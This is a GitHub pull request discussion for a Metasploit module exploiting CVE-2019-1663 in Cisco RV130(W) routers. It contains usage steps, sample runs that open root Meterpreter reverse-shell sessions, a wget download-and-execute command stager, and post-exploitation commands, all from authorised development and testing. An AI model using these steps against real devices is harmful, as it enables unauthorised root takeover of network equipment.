Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Exploit for CVE-2019-1663 on Cisco RV130(W). #11613

Merged
merged 10 commits into from Apr 12, 2019
Merged

Conversation

@QKaiser
Copy link
Contributor

QKaiser commented Mar 22, 2019

Cisco RV130(W) Routers Management Interface Remote Command Execution

A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.

The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.

A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
system of the affected device as a high-privilege user.

Vulnerable Device

  • RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
  • RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.

This exploit was specifically written against version 1.0.3.28. To test, you can find the
firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28

Verification Steps

  1. Start msfconsole
  2. use exploit/linux/http/cisco_rv130_rmi_rce
  3. set rhost [IP]
  4. set payload linux/armle/meterpreter_reverse_tcp
  5. set lhost [IP]
  6. exploit
  7. You should get a session

Sample run:

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/FiGVSQDm60T
[*] Client 192.168.1.1 (Wget) requested /FiGVSQDm60T
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 7 opened (192.168.1.100:4444 -> 192.168.1.1:45947) at 2019-03-22 20:33:48 +0100
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.31.1-cavm1)
Architecture : armv6l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux

TODO

Confirm offsets for the following firmware versions:

  • 1.0.3.44
  • 1.0.3.28
  • 1.0.3.22
  • 1.0.3.16
  • 1.0.3.14
  • 1.0.2.7
  • 1.0.1.3
  • 1.0.0.21
@QKaiser

This comment has been minimized.

Copy link
Contributor Author

QKaiser commented Mar 22, 2019

Just confirmed all versions have the same offsets. They've been using the same libc version since first release:

find -name "libc.so.0" -exec sha1sum {} \;
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.0.21/_RV130X_FW_1.0.0.21.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.1.3/_RV130X_FW_1.0.1.3.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.3.44/_RV130X_FW_1.0.3.44.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.3.22/_RV130X_FW_1.0.3.22.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.3.28/_RV130X_FW_1.0.3.28.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.3.14/_RV130X_FW_1.0.3.14.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.2.7/_RV130X_FW_1.0.2.7.bin.extracted/squashfs-root/lib/libc.so.0
a9cc842a0641dff43765c9110167316598252a5f  ./1.0.3.16/_RV130X_FW_1.0.3.16.bin.extracted/squashfs-root/lib/libc.so.0
@QKaiser

This comment has been minimized.

Copy link
Contributor Author

QKaiser commented Mar 22, 2019

@wvu-r7 given there is no process continuation here, the httpd server will stop and there is no watchdog on the device taking care of restart. Is there a way to automatically execute a command once a shell lands ?

If not, I'll just put this in the documentation for operators who wants to leave the device operating normally:

meterpreter > pkill -x 'httpd'
Filtering on 'httpd'
Killing: 816, 808
meterpreter > cd /www
meterpreter > execute -f /usr/sbin/httpd
Process 30019 created.
meterpreter > execute -f /usr/sbin/httpd -a '-S'
Process 30061 created.
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Mar 22, 2019

@QKaiser: Look at modules using on_new_session and shell_command_token. I think that'll work for you.

@wvu-r7 wvu-r7 self-assigned this Mar 22, 2019
@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Mar 23, 2019

@QKaiser: Look at modules using on_new_session and shell_command_token. I think that'll work for you.

You may or may not need to do something like this, to handle shell sessions and meterpreter sessions differently.

  def on_new_session(session)
    if session.type.to_s.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.sys.process.execute '/bin/sh', "-c \"some commands\""
    else
      session.shell_command("some commands")
    end
  ensure
    super
  end
@bcoles bcoles added the docs label Mar 23, 2019
@QKaiser

This comment has been minimized.

Copy link
Contributor Author

QKaiser commented Mar 24, 2019

Thanks for the pointers towards on_new_session :) Implemented with 4451225

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Mar 24, 2019

This looks reasonable to me. There's some minor issues with indentation and hash rocket alignment in the module boiler plate header. Also CISCO-SA is not a supported Reference key.

Given that there's a high chance of device DoS, this should be mentioned in the module description. It's worth noting that successful exploitation may not result in a session, and as such, on_new_session will never repair the HTTP server.

I'm not sure if any msf devs have any of these devices lying around, in which case whoever handles this PR may request you provide a PCAP. You can do so via uploading as an attachment to this PR, or emailing msfdev [at] metasploit.com

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

QKaiser commented Mar 24, 2019

I removed the CISCO-SA reference key and mentioned potential DoS in the module description.

I'll keep an eye on this PR and provide PCAPs if required. Thanks again for the support :)

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Mar 25, 2019

I believe we bought a device for #11435. I'll be using that if I can.

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

QKaiser commented Mar 25, 2019

I believe we bought a device for #11435. I'll be using that if I can.

This is not the same device. The RV320 is a MIPS-based device while RV130(W) is ARM-based :)

Note that even if CVE-2019-1663 is the same issue affecting RV130(W) / RV110(W) / RV215(W) devices, this module will only work against RV130(W) given that RV110(W) and RV215(W) are MIPSEL devices.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Mar 25, 2019

Ah, my bad. I thought I saw both model numbers in one of the tickets, but clearly I was mistaken.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Mar 27, 2019

We've ordered a test device that should be here soon. Emulating this with QEMU system (and Firmadyne) has been... reluctant.

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

QKaiser commented Mar 28, 2019

Emulating this with QEMU system (and Firmadyne) has been... reluctant.

I know that feel. Just managed to make the RV110 HTTP server work on system-qemu-mipsel..

If everything works as expected, I should be able to get similar exploits for RV110/RV215. Currently hunting down people who might have one of these.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Apr 3, 2019

First test!

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run

[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/TbsTw0cDOqmms92
[*] Local IP: http://192.168.8.245:8080/TbsTw0cDOqmms92
[*] Generated command stager: ["wget -qO /tmp/nZnrqiSg http://192.168.1.100:8080/TbsTw0cDOqmms92;chmod +x /tmp/nZnrqiSg;/tmp/nZnrqiSg;rm -f /tmp/nZnrqiSg"]
[*] Client 192.168.1.1 (Wget) requested /TbsTw0cDOqmms92
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.1:53135) at 2019-04-03 15:08:04 -0500
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.31.1-cavm1)
Architecture : armv6l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Apr 3, 2019

Running into some instability (potential bug in Meterpreter):

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.31.1-cavm1)
Architecture : armv6l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > ls
[-] Error running command ls: Rex::TimeoutError Operation timed out.
meterpreter > getuid
[-] Error running command getuid: Rex::TimeoutError Operation timed out.
meterpreter >
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Apr 11, 2019

Once #11710 lands, ls should be fixed in Meterpreter. I'll give this a final test and land after that happens.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Apr 11, 2019

Meterpreter ls fixed after I landed #11710:

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.31.1-cavm1)
Architecture : armv6l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > ls
Listing: /www
=============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100644/rw-r--r--  591     fil   2017-03-30 04:24:02 -0500  Authorized_AP_Template.csv
100644/rw-r--r--  3830    fil   2017-03-30 04:24:02 -0500  BT.asp
100644/rw-r--r--  2796    fil   2017-03-30 04:24:02 -0500  BT_common.js
100644/rw-r--r--  6846    fil   2017-03-30 04:24:02 -0500  Diagnostics.asp
100644/rw-r--r--  1327    fil   2017-03-30 04:24:02 -0500  P.js
100644/rw-r--r--  9802    fil   2017-03-30 04:24:02 -0500  RSTP.asp
100644/rw-r--r--  1280    fil   2017-03-30 04:24:02 -0500  Radius.asp
100644/rw-r--r--  1601    fil   2017-03-30 04:24:02 -0500  Success.asp
100644/rw-r--r--  12130   fil   2017-03-30 04:24:02 -0500  TR.asp
100644/rw-r--r--  628     fil   2017-03-30 04:24:02 -0500  User_Import_Template.csv
100644/rw-r--r--  2866    fil   2017-03-30 04:24:02 -0500  VPN.asp
100644/rw-r--r--  7243    fil   2017-03-30 04:24:02 -0500  WEP.asp
100644/rw-r--r--  14548   fil   2017-03-30 04:24:02 -0500  WL_WPATable.asp
100644/rw-r--r--  3409    fil   2017-03-30 04:24:02 -0500  WPA_Preshared.asp
100644/rw-r--r--  570     fil   2017-03-30 04:24:02 -0500  WPA_Radius.asp
100644/rw-r--r--  8300    fil   2017-03-30 04:24:02 -0500  Wireless_Advanced.asp
100644/rw-r--r--  10607   fil   2017-03-30 04:24:02 -0500  Wireless_MAC.asp
100644/rw-r--r--  38320   fil   2017-03-30 04:24:02 -0500  Wireless_Manual.asp
100644/rw-r--r--  16250   fil   2017-03-30 04:24:02 -0500  Wireless_WPS.asp
100644/rw-r--r--  5652    fil   2017-03-30 04:24:02 -0500  Wireless_captive.asp
100644/rw-r--r--  11056   fil   2017-03-30 04:24:02 -0500  Wireless_user.asp
100644/rw-r--r--  5491    fil   2017-03-30 04:24:02 -0500  Wireless_welcome.asp
100644/rw-r--r--  12370   fil   2017-03-30 04:24:02 -0500  Wireless_welcome_edit.asp
100644/rw-r--r--  3868    fil   2017-03-30 04:24:02 -0500  Wireless_welcome_prev.asp
100644/rw-r--r--  2477    fil   2017-03-30 04:24:02 -0500  about.asp
100644/rw-r--r--  3520    fil   2017-03-30 04:24:02 -0500  access_gnet.asp
100644/rw-r--r--  6407    fil   2017-03-30 04:24:02 -0500  access_time.asp
100644/rw-r--r--  4620    fil   2017-03-30 04:24:02 -0500  activelist.asp
100644/rw-r--r--  15509   fil   2017-03-30 04:24:02 -0500  adv_prefixes.asp
100644/rw-r--r--  3324    fil   2017-03-30 04:24:02 -0500  alert_msg.asp
100644/rw-r--r--  23165   fil   2017-03-30 04:24:02 -0500  authap.asp
100644/rw-r--r--  16417   fil   2017-03-30 04:24:02 -0500  backup.asp
100644/rw-r--r--  36862   fil   2017-03-30 04:24:02 -0500  bandwidth.asp
100644/rw-r--r--  2058    fil   2017-03-30 04:24:02 -0500  base64.js
100644/rw-r--r--  4156    fil   2017-03-30 04:24:02 -0500  bonjour.asp
100644/rw-r--r--  19511   fil   2017-03-30 04:24:02 -0500  bsd_log_email.asp
100644/rw-r--r--  1019    fil   2017-03-30 04:24:02 -0500  bsd_show_step.asp
100644/rw-r--r--  22009   fil   2017-03-30 04:24:02 -0500  captive_login.asp
100644/rw-r--r--  24255   fil   2017-03-30 04:24:02 -0500  category.asp
100644/rw-r--r--  2252    fil   2017-03-30 04:24:02 -0500  cert_data.asp
100644/rw-r--r--  3005    fil   2017-03-30 04:24:02 -0500  cert_upload.asp
100644/rw-r--r--  10713   fil   2017-03-30 04:24:02 -0500  change_password.asp
100644/rw-r--r--  1739    fil   2017-03-30 04:24:02 -0500  change_password_tree.asp
100644/rw-r--r--  1014    fil   2017-03-30 04:24:02 -0500  check_session.asp
100644/rw-r--r--  419     fil   2017-03-30 04:24:02 -0500  check_status.asp
100644/rw-r--r--  87058   fil   2017-03-30 04:24:02 -0500  common.js
100644/rw-r--r--  1774    fil   2017-03-30 04:24:02 -0500  config_change_pwd.asp
100644/rw-r--r--  2616    fil   2017-03-30 04:24:02 -0500  config_user.asp
100644/rw-r--r--  3844    fil   2017-03-30 04:24:02 -0500  cos.asp
100644/rw-r--r--  50850   fil   2017-03-30 04:24:02 -0500  cues_drawn.js
100644/rw-r--r--  50949   fil   2017-03-30 04:24:02 -0500  cues_taglib.css
100644/rw-r--r--  276464  fil   2017-03-30 04:24:02 -0500  cues_taglib.js
100644/rw-r--r--  7810    fil   2017-03-30 04:24:02 -0500  cues_taglib_layout.js
100644/rw-r--r--  22473   fil   2017-03-30 04:24:02 -0500  dashboard.asp
100644/rw-r--r--  1467    fil   2017-03-30 04:24:02 -0500  dbg_diag.asp
100644/rw-r--r--  18954   fil   2017-03-30 04:24:02 -0500  ddns.asp
100644/rw-r--r--  24781   fil   2017-03-30 04:24:02 -0500  default.asp
100644/rw-r--r--  3231    fil   2017-03-30 04:24:02 -0500  define.js
100644/rw-r--r--  2944    fil   2017-03-30 04:24:02 -0500  device.asp
100644/rw-r--r--  5133    fil   2017-03-30 04:24:02 -0500  dhcp_leased_client.asp
100644/rw-r--r--  4474    fil   2017-03-30 04:24:02 -0500  dmz_host.asp
100644/rw-r--r--  6718    fil   2017-03-30 04:24:02 -0500  dscp.asp
100644/rw-r--r--  4555    fil   2017-03-30 04:24:02 -0500  ea_domain.asp
100644/rw-r--r--  6365    fil   2017-03-30 04:24:02 -0500  ea_domain_edit.asp
100644/rw-r--r--  6087    fil   2017-03-30 04:24:02 -0500  ea_group.asp
100644/rw-r--r--  3690    fil   2017-03-30 04:24:02 -0500  ea_group_edit.asp
100644/rw-r--r--  6615    fil   2017-03-30 04:24:02 -0500  ea_user.asp
100644/rw-r--r--  6428    fil   2017-03-30 04:24:02 -0500  ea_user_browser.asp
100644/rw-r--r--  4133    fil   2017-03-30 04:24:02 -0500  ea_user_edit.asp
100644/rw-r--r--  7348    fil   2017-03-30 04:24:02 -0500  ea_user_ip.asp
100644/rw-r--r--  2672    fil   2017-03-30 04:24:02 -0500  ea_user_loginpolicy.asp
100644/rw-r--r--  144     fil   2017-03-30 04:24:02 -0500  encode_data.js
100644/rw-r--r--  45519   fil   2017-03-30 04:24:02 -0500  except.asp
100644/rw-r--r--  1869    fil   2017-03-30 04:24:02 -0500  factory.asp
100644/rw-r--r--  19005   fil   2017-03-30 04:24:02 -0500  failover.asp
100644/rw-r--r--  976     fil   2017-03-30 04:24:02 -0500  filelink.asp
100644/rw-r--r--  9742    fil   2017-03-30 04:24:02 -0500  filter.asp
100644/rw-r--r--  36170   fil   2017-03-30 04:24:02 -0500  filter_edit.asp
100644/rw-r--r--  19637   fil   2017-03-30 04:24:02 -0500  firewall.asp
100644/rw-r--r--  50131   fil   2017-03-30 04:24:02 -0500  func.js
100644/rw-r--r--  3822    fil   2017-03-30 04:24:02 -0500  gen_cert.asp
100644/rw-r--r--  200     fil   2017-03-30 04:24:02 -0500  get_card_info.asp
100644/rw-r--r--  98      fil   2017-03-30 04:24:02 -0500  get_redirect.asp
100644/rw-r--r--  1978    fil   2017-03-30 04:24:02 -0500  getconnst.asp
100644/rw-r--r--  144     fil   2017-03-30 04:24:02 -0500  getconnst_1.asp
100644/rw-r--r--  7430    fil   2017-03-30 04:24:02 -0500  getstart.asp
100644/rw-r--r--  4338    fil   2017-03-30 04:24:02 -0500  getstatus.asp
100644/rw-r--r--  420     fil   2017-03-30 04:24:02 -0500  guest.asp
100644/rw-r--r--  1098    fil   2017-03-30 04:24:02 -0500  guest1.asp
100644/rw-r--r--  10906   fil   2017-03-30 04:24:02 -0500  guest_info.asp
40755/rwxr-xr-x   82      dir   2017-03-30 04:24:02 -0500  help
100644/rw-r--r--  19202   fil   2017-03-30 04:24:02 -0500  ike_edit.asp
40755/rwxr-xr-x   2546    dir   2017-03-30 04:24:02 -0500  image
100644/rw-r--r--  52389   fil   2017-03-30 04:24:02 -0500  imgfix.css
100644/rw-r--r--  2964    fil   2017-03-30 04:24:02 -0500  index_l2tp.asp
100644/rw-r--r--  176     fil   2017-03-30 04:24:02 -0500  index_pppoe.asp
100644/rw-r--r--  1106    fil   2017-03-30 04:24:02 -0500  index_pptp.asp
100644/rw-r--r--  1941    fil   2017-03-30 04:24:02 -0500  index_static.asp
100644/rw-r--r--  16482   fil   2017-03-30 04:24:02 -0500  ip_based_acl.asp
100644/rw-r--r--  29559   fil   2017-03-30 04:24:02 -0500  ip_based_acl_edit.asp
100644/rw-r--r--  9098    fil   2017-03-30 04:24:02 -0500  ip_based_acl_order.asp
100644/rw-r--r--  8011    fil   2017-03-30 04:24:02 -0500  ip_mode.asp
100644/rw-r--r--  33457   fil   2017-03-30 04:24:02 -0500  ipsec_edit.asp
100644/rw-r--r--  13542   fil   2017-03-30 04:24:02 -0500  ipsec_setup.asp
100644/rw-r--r--  7803    fil   2017-03-30 04:24:02 -0500  ipsec_user.asp
100644/rw-r--r--  16048   fil   2017-03-30 04:24:02 -0500  ipv6_routing.asp
100644/rw-r--r--  27020   fil   2017-03-30 04:24:02 -0500  lan.asp
100644/rw-r--r--  12730   fil   2017-03-30 04:24:02 -0500  lan_host.asp
100644/rw-r--r--  18960   fil   2017-03-30 04:24:02 -0500  lan_ipv6.asp
40755/rwxr-xr-x   316     dir   2017-03-30 04:24:02 -0500  lang_pack
100644/rw-r--r--  1485    fil   2017-03-30 04:24:02 -0500  license.asp
100644/rw-r--r--  10246   fil   2017-03-30 04:24:02 -0500  license.js
100644/rw-r--r--  3640    fil   2017-03-30 04:24:02 -0500  linkagg.asp
100644/rw-r--r--  26586   fil   2017-03-30 04:24:02 -0500  log.asp
100644/rw-r--r--  21115   fil   2017-03-30 04:24:02 -0500  log_email.asp
100644/rw-r--r--  13804   fil   2017-03-30 04:24:02 -0500  login.asp
100644/rw-r--r--  13479   fil   2017-03-30 04:24:02 -0500  login_guest.asp
100644/rw-r--r--  4303    fil   2017-03-30 04:24:02 -0500  macclone.asp
100644/rw-r--r--  5578    fil   2017-03-30 04:24:02 -0500  man_cerificate.asp
100644/rw-r--r--  8827    fil   2017-03-30 04:24:02 -0500  md5.js
100644/rw-r--r--  18775   fil   2017-03-30 04:24:02 -0500  mobile.asp
100644/rw-r--r--  7865    fil   2017-03-30 04:24:02 -0500  mobile_dl.asp
100644/rw-r--r--  16973   fil   2017-03-30 04:24:02 -0500  nat_1to1.asp
100644/rw-r--r--  4678    fil   2017-03-30 04:24:02 -0500  network_tools.asp
100644/rw-r--r--  5992    fil   2017-03-30 04:24:02 -0500  password.asp
100644/rw-r--r--  1573    fil   2017-03-30 04:24:02 -0500  pngfix.js
100644/rw-r--r--  939     fil   2017-03-30 04:24:02 -0500  pollingst.asp
100644/rw-r--r--  494     fil   2017-03-30 04:24:02 -0500  port_info.asp
100644/rw-r--r--  7101    fil   2017-03-30 04:24:02 -0500  port_management.asp
100644/rw-r--r--  3844    fil   2017-03-30 04:24:02 -0500  port_mirror.asp
100644/rw-r--r--  9032    fil   2017-03-30 04:24:02 -0500  portal_chgpwd.asp
100644/rw-r--r--  2179    fil   2017-03-30 04:24:02 -0500  portal_info.asp
100644/rw-r--r--  5625    fil   2017-03-30 04:24:02 -0500  portal_layouts.asp
100644/rw-r--r--  4583    fil   2017-03-30 04:24:02 -0500  portal_layouts_edit.asp
100644/rw-r--r--  1934    fil   2017-03-30 04:24:02 -0500  portal_port_forwarding.asp
100644/rw-r--r--  2033    fil   2017-03-30 04:24:02 -0500  portal_vpntunnel.asp
100644/rw-r--r--  12606   fil   2017-03-30 04:24:02 -0500  portforward.asp
100644/rw-r--r--  1963    fil   2017-03-30 04:24:02 -0500  portst.asp
100644/rw-r--r--  4812    fil   2017-03-30 04:24:02 -0500  position.js
100644/rw-r--r--  4344    fil   2017-03-30 04:24:02 -0500  position_portal.js
100644/rw-r--r--  12479   fil   2017-03-30 04:24:02 -0500  position_url.asp
100644/rw-r--r--  4321    fil   2017-03-30 04:24:02 -0500  position_url_ap.asp
100644/rw-r--r--  589     fil   2017-03-30 04:24:02 -0500  position_url_portal.asp
100644/rw-r--r--  5304    fil   2017-03-30 04:24:02 -0500  pppoe_profile.asp
100644/rw-r--r--  11376   fil   2017-03-30 04:24:02 -0500  pppoe_profile_edit.asp
100644/rw-r--r--  5661    fil   2017-03-30 04:24:02 -0500  qos_port.asp
100644/rw-r--r--  16009   fil   2017-03-30 04:24:02 -0500  rac_ike_edit.asp
100644/rw-r--r--  28158   fil   2017-03-30 04:24:02 -0500  rac_ipsec_edit.asp
100644/rw-r--r--  18535   fil   2017-03-30 04:24:02 -0500  rac_vpn_adv.asp
100644/rw-r--r--  1260    fil   2017-03-30 04:24:02 -0500  rdt_download.asp
100644/rw-r--r--  1837    fil   2017-03-30 04:24:02 -0500  reboot.asp
100644/rw-r--r--  6030    fil   2017-03-30 04:24:02 -0500  resources.asp
100644/rw-r--r--  8652    fil   2017-03-30 04:24:02 -0500  resources_edit.asp
100644/rw-r--r--  1585    fil   2017-03-30 04:24:02 -0500  ripng.asp
100644/rw-r--r--  21194   fil   2017-03-30 04:24:02 -0500  router_ad.asp
100644/rw-r--r--  20318   fil   2017-03-30 04:24:02 -0500  routing.asp
100644/rw-r--r--  6005    fil   2017-03-30 04:24:02 -0500  routingtb.asp
100644/rw-r--r--  7809    fil   2017-03-30 04:24:02 -0500  schedule_manage.asp
100644/rw-r--r--  11327   fil   2017-03-30 04:24:02 -0500  schedule_manage_edit.asp
100644/rw-r--r--  580     fil   2017-03-30 04:24:02 -0500  security_pwd_count.js
100644/rw-r--r--  15915   fil   2017-03-30 04:24:02 -0500  service_manage.asp
100644/rw-r--r--  1871    fil   2017-03-30 04:24:02 -0500  session_timeout.asp
100644/rw-r--r--  13458   fil   2017-03-30 04:24:02 -0500  singleforward.asp
100644/rw-r--r--  7637    fil   2017-03-30 04:24:02 -0500  site_survey.asp
100644/rw-r--r--  17927   fil   2017-03-30 04:24:02 -0500  snmp.asp
100644/rw-r--r--  7985    fil   2017-03-30 04:24:02 -0500  ssl_cert.asp
100644/rw-r--r--  4435    fil   2017-03-30 04:24:02 -0500  ssl_client_route.asp
100644/rw-r--r--  10854   fil   2017-03-30 04:24:02 -0500  ssl_port_forwarding.asp
100644/rw-r--r--  3386    fil   2017-03-30 04:24:02 -0500  ssl_vpn_client.asp
100644/rw-r--r--  7309    fil   2017-03-30 04:24:02 -0500  ssl_vpn_policies.asp
100644/rw-r--r--  7956    fil   2017-03-30 04:24:02 -0500  ssl_vpn_policies_edit.asp
100644/rw-r--r--  381     fil   2017-03-30 04:24:02 -0500  ssl_vpn_portal.asp
100644/rw-r--r--  17827   fil   2017-03-30 04:24:02 -0500  static_dhcp.asp
100644/rw-r--r--  3732    fil   2017-03-30 04:24:02 -0500  status_captive.asp
100644/rw-r--r--  5236    fil   2017-03-30 04:24:02 -0500  status_guestnet.asp
100644/rw-r--r--  9762    fil   2017-03-30 04:24:02 -0500  status_ipsec.asp
100644/rw-r--r--  3757    fil   2017-03-30 04:24:02 -0500  status_ipv6.asp
100644/rw-r--r--  4743    fil   2017-03-30 04:24:02 -0500  status_mobile.asp
100644/rw-r--r--  6910    fil   2017-03-30 04:24:02 -0500  status_pptp.asp
100644/rw-r--r--  9569    fil   2017-03-30 04:24:02 -0500  status_rac_ipsec.asp
100644/rw-r--r--  8793    fil   2017-03-30 04:24:02 -0500  status_sitetosite.asp
100644/rw-r--r--  3420    fil   2017-03-30 04:24:02 -0500  status_upgrade.asp
100644/rw-r--r--  2424    fil   2017-03-30 04:24:02 -0500  status_vpn.asp
100644/rw-r--r--  7958    fil   2017-03-30 04:24:02 -0500  status_wide.asp
100644/rw-r--r--  12902   fil   2017-03-30 04:24:02 -0500  status_wireless.asp
100644/rw-r--r--  34291   fil   2017-03-30 04:24:02 -0500  style.css
100644/rw-r--r--  22138   fil   2017-03-30 04:24:02 -0500  system.asp
100644/rw-r--r--  33258   fil   2017-03-30 04:24:02 -0500  time_zone.asp
100644/rw-r--r--  14387   fil   2017-03-30 04:24:02 -0500  tree.asp
100644/rw-r--r--  12706   fil   2017-03-30 04:24:02 -0500  tree_portal.asp
100644/rw-r--r--  13010   fil   2017-03-30 04:24:02 -0500  triggering.asp
100644/rw-r--r--  15319   fil   2017-03-30 04:24:02 -0500  tunneling_6to4.asp
100644/rw-r--r--  28872   fil   2017-03-30 04:24:02 -0500  upgrade.asp
100644/rw-r--r--  3504    fil   2017-03-30 04:24:02 -0500  usb_show.asp
100644/rw-r--r--  17855   fil   2017-03-30 04:24:02 -0500  users.asp
100644/rw-r--r--  12892   fil   2017-03-30 04:24:02 -0500  view_logs.asp
100644/rw-r--r--  17415   fil   2017-03-30 04:24:02 -0500  vlan_membership.asp
100644/rw-r--r--  1269    fil   2017-03-30 04:24:02 -0500  vlan_valid_subnet.js
100644/rw-r--r--  23095   fil   2017-03-30 04:24:02 -0500  vpn_adv.asp
100644/rw-r--r--  10642   fil   2017-03-30 04:24:02 -0500  vpn_basic.asp
100644/rw-r--r--  7461    fil   2017-03-30 04:24:02 -0500  vpn_basic_view.asp
100644/rw-r--r--  24001   fil   2017-03-30 04:24:02 -0500  vpn_client.asp
100644/rw-r--r--  34800   fil   2017-03-30 04:24:02 -0500  wan.asp
100644/rw-r--r--  19857   fil   2017-03-30 04:24:02 -0500  wan_ipv6.asp
100644/rw-r--r--  14344   fil   2017-03-30 04:24:02 -0500  wds.asp
100644/rw-r--r--  24459   fil   2017-03-30 04:24:02 -0500  webfilter.asp
40755/rwxr-xr-x   822     dir   2017-03-30 04:24:02 -0500  wizard
100644/rw-r--r--  431     fil   2017-03-30 04:24:02 -0500  wizard.asp
40755/rwxr-xr-x   221     dir   2017-03-30 04:24:02 -0500  wizard_vpn
100644/rw-r--r--  1108    fil   2017-03-30 04:24:02 -0500  wizard_vpn.asp
100644/rw-r--r--  2445    fil   2017-03-30 04:24:02 -0500  workmode.asp

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Apr 12, 2019

I spent a little time yesterday looking for alternative ROP chains. I think the one you've chosen is basically perfect for arbitrary system(3) execution. Excellent work. I'm landing this as it stands.

@wvu-r7 wvu-r7 merged commit 5e18919 into rapid7:master Apr 12, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
wvu-r7 added a commit that referenced this pull request Apr 12, 2019
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Apr 12, 2019

Release Notes

The Cisco RV130W RMI RCE module is a stack-based buffer overflow exploit that allows you to target vulnerable Cisco RV130 and RV130W VPN routers.

msjenkins-r7 added a commit that referenced this pull request Apr 12, 2019
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Apr 12, 2019

Sorry, I have some quick updates in #11721 I'll land right away.

@tdoan-r7 tdoan-r7 added the rn-modules label Apr 17, 2019
@ccondon-r7

This comment has been minimized.

Copy link
Contributor

ccondon-r7 commented Jun 20, 2019

Hey @QKaiser, a heads up: We're going to be featuring a deep dive into this exploit in the Q2 edition of Metasploit's development diaries series next week. You'll be acknowledged for the (great) contribution, and we'll post a link here when it's out! For reference, the Q1 development diaries read like this: https://www.rapid7.com/research/report/metasploit-development-diaries-q1-2019/

@ccondon-r7

This comment has been minimized.

Copy link
Contributor

ccondon-r7 commented Jun 25, 2019

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

QKaiser commented Jul 18, 2019

Hi there !

I got my module working against all vulnerable firmware versions of Cisco RV110W on a physical device.

What's the best course of action here ? Should I create a module per model (one for RV110, one for RV130, one for RV215) or should I keep a single module for this vulnerability (CVE-2019-1663) ?

If we keep the same module, it has to be renamed by removing the 'rv130' from it. If we do separate modules there will be a lot of repetition (e.g. the payload construction function is exactly the same for all versions of RV110/RV215 and would therefore be replicated in two different modules).

Demo of working exploits below 🤖

Cisco RV110W (firmware version 1.1.0.9)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check

[+] Successfully identified device: Cisco RV110W 1.1.0.9
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 0
target => 0
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run

